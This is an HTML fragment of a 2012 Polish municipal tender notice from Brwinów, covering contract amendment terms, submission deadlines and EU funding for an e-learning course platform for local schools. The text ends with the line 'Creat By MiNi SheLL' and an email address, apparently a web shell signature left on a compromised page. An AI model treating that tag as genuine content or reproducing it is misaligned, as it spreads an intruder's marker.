9)	w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
10)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds.Zamówień Publicznych, pokój nr 22..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.GRODZISKA 12, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opracowanie, uruchomienie na e-learningowej platformie edukacyjnej kursów języka angielskiego, informatyki, matematyki w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych oraz z liceum ogólnokształcącego wraz z wyhostowaniem platformy edukacyjnej i jednostek e-learningowych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Projekt realizowany w ramach umowy nr UDA-POKL.09.01.02-14-079/10-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com